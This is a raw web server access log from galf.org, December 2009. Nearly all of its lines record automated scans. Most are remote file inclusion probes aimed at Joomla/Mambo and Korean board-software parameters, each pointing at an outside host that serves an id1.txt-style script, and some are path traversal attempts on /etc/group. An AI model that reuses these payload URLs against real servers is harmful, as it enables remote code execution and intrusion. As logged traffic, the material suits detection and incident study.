196.40.83.71 - - [21/Dec/2009:01:43:41 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:44:14 -0800] "GET ////bbs//skin/ggambo7002_board/write.php?dir=http://www.thaisocial.net/~constitution/crawler_project/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:44:17 -0800] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://www.thaisocial.net/~constitution/crawler_project/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:44:17 -0800] "GET /logs/access_091026.log/////bbs//skin/ggambo7002_board/write.php?dir=http://www.thaisocial.net/~constitution/crawler_project/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:44:19 -0800] "GET /logs/access.log/////bbs//skin/ggambo7002_board/write.php?dir=http://www.thaisocial.net/~constitution/crawler_project/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:44:24 -0800] "GET ////bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:44:24 -0800] "GET /logs/access.log/////bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:01:44:33 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:01:44:37 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:01:44:37 -0800] "GET /logs/access_090706.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.174.65.34 - - [21/Dec/2009:01:44:57 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.174.65.34 - - [21/Dec/2009:01:44:57 -0800] "GET /akocomments.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.174.65.34 - - [21/Dec/2009:01:44:57 -0800] "GET /akocomments.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.174.65.34 - - [21/Dec/2009:01:44:58 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:45:16 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://vostokmedia.com//files/Image/17/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:45:16 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://vostokmedia.com//files/Image/17/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:45:16 -0800] "GET /logs/access_091109.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://vostokmedia.com//files/Image/17/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:46:11 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:46:13 -0800] "GET /logs/access_091109.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:46:22 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:46:27 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:46:27 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:46:27 -0800] "GET /logs/access_091109.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:01:46:28 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:01:46:29 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:01:46:31 -0800] "GET /logs/access_090706.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:46:32 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:46:33 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:46:33 -0800] "GET /logs/access_091109.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:46:33 -0800] "GET /logs/access_091109.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:46:34 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:46:35 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:46:37 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:46:38 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:46:39 -0800] "GET /logs/access_091109.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://vostokmedia.com//files/Image/17/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:46:39 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:46:39 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:46:40 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:46:40 -0800] "GET /logs/access_091109.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:46:45 -0800] "GET /logs/access_091109.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:46:45 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:46:47 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:46:47 -0800] "GET /logs/access_091109.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:46:47 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:46:49 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:46:49 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:46:49 -0800] "GET /logs/access_090921.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:46:50 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:46:50 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:46:50 -0800] "GET /logs/access_090921.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:46:50 -0800] "GET /logs/access_091109.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:48:05 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://vostokmedia.com//files/Image/17/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:48:05 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://vostokmedia.com//files/Image/17/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:48:05 -0800] "GET /logs/access_091109.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://vostokmedia.com//files/Image/17/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:01:48:14 -0800] "GET ////bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "galf.org"
61.47.61.97 - - [21/Dec/2009:01:48:14 -0800] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "galf.org"
200.93.147.154 - - [21/Dec/2009:01:48:17 -0800] "GET /logs/access_090921.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:48:17 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:48:22 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [21/Dec/2009:01:48:25 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [21/Dec/2009:01:48:25 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [21/Dec/2009:01:48:25 -0800] "GET /logs/access_091109.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [21/Dec/2009:01:49:12 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.141.47 - - [21/Dec/2009:01:49:12 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.141.47 - - [21/Dec/2009:01:49:13 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.217.5.166 - - [21/Dec/2009:01:49:19 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [21/Dec/2009:01:49:19 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [21/Dec/2009:01:49:19 -0800] "GET /logs/access_090921.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.187 - - [21/Dec/2009:01:49:19 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
66.102.237.81 - - [21/Dec/2009:01:49:29 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
66.102.237.81 - - [21/Dec/2009:01:49:29 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
66.102.237.81 - - [21/Dec/2009:01:49:29 -0800] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
210.249.179.82 - - [21/Dec/2009:01:50:09 -0800] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.249.179.82 - - [21/Dec/2009:01:50:09 -0800] "GET /logs/access_090921.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.249.179.82 - - [21/Dec/2009:01:50:09 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
153.19.209.78 - - [21/Dec/2009:01:50:19 -0800] "GET /logs/access.log HTTP/1.1" 200 466549 "http://www.galf.org/logs/" "Opera/9.80 (Windows NT 6.0; U; pl) Presto/2.2.15 Version/10.10" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:01:50:21 -0800] "GET /logs/access_091109.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:01:50:21 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:01:50:21 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:01:50:29 -0800] "GET /logs/access_091109.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:01:50:29 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:01:50:29 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [21/Dec/2009:01:50:38 -0800] "GET /logs/access_090706.log//include.php?path%5Bdocroot%5D=http://med.buu.ac.th/administrator/popups/id2?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.187 - - [21/Dec/2009:01:50:52 -0800] "GET /logs/access_090803.log HTTP/1.1" 200 65536 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:50:58 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:50:58 -0800] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:50:58 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:51:08 -0800] "GET /logs/access_090706.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
153.19.209.78 - - [21/Dec/2009:01:51:13 -0800] "GET / HTTP/1.1" 200 1048 "-" "Opera/9.80 (Windows NT 6.0; U; pl) Presto/2.2.15 Version/10.10" "www.galf.org"
153.19.209.78 - - [21/Dec/2009:01:51:25 -0800] "GET /logs/access.log HTTP/1.1" 200 469507 "http://www.galf.org/logs/" "Opera/9.80 (Windows NT 6.0; U; pl) Presto/2.2.15 Version/10.10" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:51:42 -0800] "GET /logs/access_091019.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.33.199.19 - - [21/Dec/2009:01:51:54 -0800] "GET /logs/access_090921.log%20//skin/ggambo7002_board/login.php?dir=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
84.33.199.19 - - [21/Dec/2009:01:51:54 -0800] "GET /skin/ggambo7002_board/login.php?dir=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:51:55 -0800] "GET /logs/access_091109.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.33.199.19 - - [21/Dec/2009:01:51:59 -0800] "GET /logs//skin/ggambo7002_board/login.php?dir=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:53:23 -0800] "GET /logs/access_090720.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:53:28 -0800] "GET /logs/access_090928.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:53:52 -0800] "GET /logs/access_091019.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://vostokmedia.com//files/Image/17/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:53:54 -0800] "GET /logs/access_091019.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://vostokmedia.com//files/Image/17/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [21/Dec/2009:01:54:40 -0800] "GET /logs/access_090921.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [21/Dec/2009:01:55:15 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "galf.org"
222.122.141.47 - - [21/Dec/2009:01:55:15 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "galf.org"
222.122.141.47 - - [21/Dec/2009:01:55:16 -0800] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.141.47 - - [21/Dec/2009:01:56:27 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [21/Dec/2009:01:56:27 -0800] "GET /logs/access_091012.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [21/Dec/2009:01:56:29 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [21/Dec/2009:01:58:59 -0800] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [21/Dec/2009:01:59:42 -0800] "GET /logs/access_090706.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.146.96.242 - - [21/Dec/2009:02:00:52 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.146.96.242 - - [21/Dec/2009:02:00:52 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.146.96.242 - - [21/Dec/2009:02:00:53 -0800] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.146.96.242 - - [21/Dec/2009:02:01:16 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
